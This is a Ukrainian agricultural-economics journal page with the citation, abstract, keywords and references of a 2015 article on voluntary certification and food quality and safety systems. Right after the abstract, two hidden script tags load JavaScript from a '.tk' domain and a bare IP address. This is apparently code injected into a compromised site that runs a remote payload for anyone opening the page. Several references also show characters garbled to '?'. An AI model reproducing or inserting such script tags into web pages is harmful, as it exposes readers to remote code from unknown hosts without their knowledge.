eISSN 2413-2322

pISSN 2221-1055

УДК: 631.1:006.063
Сторінка молодого науковця

Добровільна сертифікація як інструмент забезпечення якості аграрної продукції / Висоцька І. М. // Економіка АПК. - 2015. - № 6 - С. 101

Висвітлено останні законодавчі ініціативи у сфері забезпечення і контролю якості та безпечності продуктів харчування, що наслідують європейські. Окреслено основні зміни й вимоги до операторів ринку, а саме у питанні запровадження систем НАССР та забезпечення простежуваності. Визначено, що таке перекладання відповідальності за якість і безпечність харчових продуктів на учасників ланцюга їх постачання стало поштовхом для запровадження добровільної сертифікації в міжнародній практиці. Зроблено аналіз даних реєстру поширених в ЄС систем добровільної сертифікації, а також розроблених для них Настанов з доброї практики. Систематизовано основні фактори впливу на якість проведення аудитів та інспектування сертифікаційним органом і на основі базової графічної моделі розглянуто можливі напрями її поліпшення. Рис.: 5. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: якість, безпечність, простежуваність, сільськогосподарська продукція, добровільна сертифікація, оптимальний рівень якості

Список використаних джерел

  1. Висоцька І.М. Нові підходи у визначенні понять якість і безпечність продукції тваринництва / І.М Висоцька // Вісн. Сумського нац. аграр. ун-ту. – 2014. – №4 (59). – С. 82-88.
  2. Висоцька І.М. Система управління якістю молока в Німеччині: від приватної ініціативи до єдиного стан-дарту / І.М. Висоцька // Збірник наук. праць Вінницького нац. аграр. ун-ту. – 2013. – №3 (80). – С. 47-60.
  3. Галушко В. П. Зарубіжні системи забезпечення якості молока у виробничому ланцюзі та можливості їх застосування в Україні / В. П. Галушко, І. М. Суха // Економіка АПК. – 2011. – № 3. – С. 137-142.
  4. Про внесення змін до деяких законодавчих актів України щодо харчових продуктів : Закон України від 22 трав. 2014 р. № 1602-VII [Електронний ресурс]. ? Режим доступу : http://zakon2.rada.gov.ua/laws/show/1602-18.
  5. Про підтвердження відповідності : Закон України від 17 трав. 2001 р. № 2406 – ІІІ [Електронний ресурс]. ? Режим доступу : http://zakon2.rada.gov.ua/laws/show/2406-14.
  6. Про стандартизацію і сертифікацію: Декрет Кабінету Міністрів України від 10 трав. 1993 № 46-93 [Електронний ресурс]. ? Режим доступу : http://zakon2.rada.gov.ua/laws/show/46-93.
  7. Auriol, E. and Schilizzi, S. (2000). Quality Signaling Through Certification. 2000 Conference (44th), January 23-25, 2000, Sydney, Australia, Australian Agricultural and Resource Economics Society. Available at: http://purl.umn.edu/123598. Accessed on: February, 2015.
  8. Commission Communication — EU best practice guidelines for voluntary certification schemes for agricultural products and foodstuffs. Official Journal. of the European Union С 341, 16 December 2010, pp. 5-11. Available at: http://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=CELEX:52010XC1216(02)&from=en. Accessed on: February, 2015.
  9. Inventory of certification schemes for agricultural products and foodstuffs marketed in the EU Member States, Aret? Research and Consulting in Economics, 2010. Available at: http://ec.europa.eu/agriculture/quality/certification/index_en.htm. Accessed on: February, 2015.
  10. Jahn, G. Schramm, M. and Spiller, A. (2003). Zur Ausgestaltung von Qualit?tssicherungssystemen in der Lebensmittelwirtschaft: eine ?konomische Analyse, in: Perspektiven in der Landnutzung, Tagungsband zur Gewisola 2003, pp. 159-167.
  11. Jahn, G., Schramm, M., and Spiller, A. (2003). Zur Glaubw?rdigkeit von Zertifizierungssystemen. Discussion paper 0304. University of G?ttingen, G?ttingen, Institute of Agricultural Economics. Available at: http://www.uni-goettingen.de/de/document/download/69d421644c49352d9b303174aedd84ca.pdf/Diskussionsbeitrag0304.pdf. Accessed on: March 2013.
  12. Martinez, M.G., Fearne, A., Caswell, J.A. and Henson, S. (2007). Co-regulation as a possible model for food safety governance: Opportunities for public-private partnerships. Food Policy, 32, pp. 299–314.
  13. P?chtrager. S. (2011). Qualit?tsmanagement in der Agrar- und Ern?hrungswirtschaft. Institutionen. Strukturen und entscheidungsrelevante Faktoren. Heidelberg, Springer.
  14. Spiller, A., Jahn, G. (2003). Einflussfaktoren auf die Pr?fungsqualit?t: QS-Systeme und Wirtschaftspr?fung im Vergleich - Eine agencytheoretische Analyse, in: Tagungsband zur 24. GIL Jahrestagung, G?ttingen, pp. 150-153.
  15. Theuvsen, L., Lehnert, S., and Bruckner, S. (2013). Zertifizierungsverfahren und ihre Grundlagen, in: Petersen, B., N?ssel, M. (Eds.), Qualit?tsmanagement in der Agrar- und Ern?hrungswirtschaft, D?sseldorf, pp. 138 ? 176.
  16. Will, M. and Guenther, D. (2007). Food Quality and safety standards, as required by EU Law and the private industry with special reference to the MEDA countries' exports of fresh and processed fruit & vegetables, herbs & spices. A Practitioners’ Reference Book; 2nd edition; GTZ, Eschborn, Germany. Available at: http://www2.gtz.de/dokumente/bib/07-0800.pdf.

Читати статтю: 15_06_101-108.pdf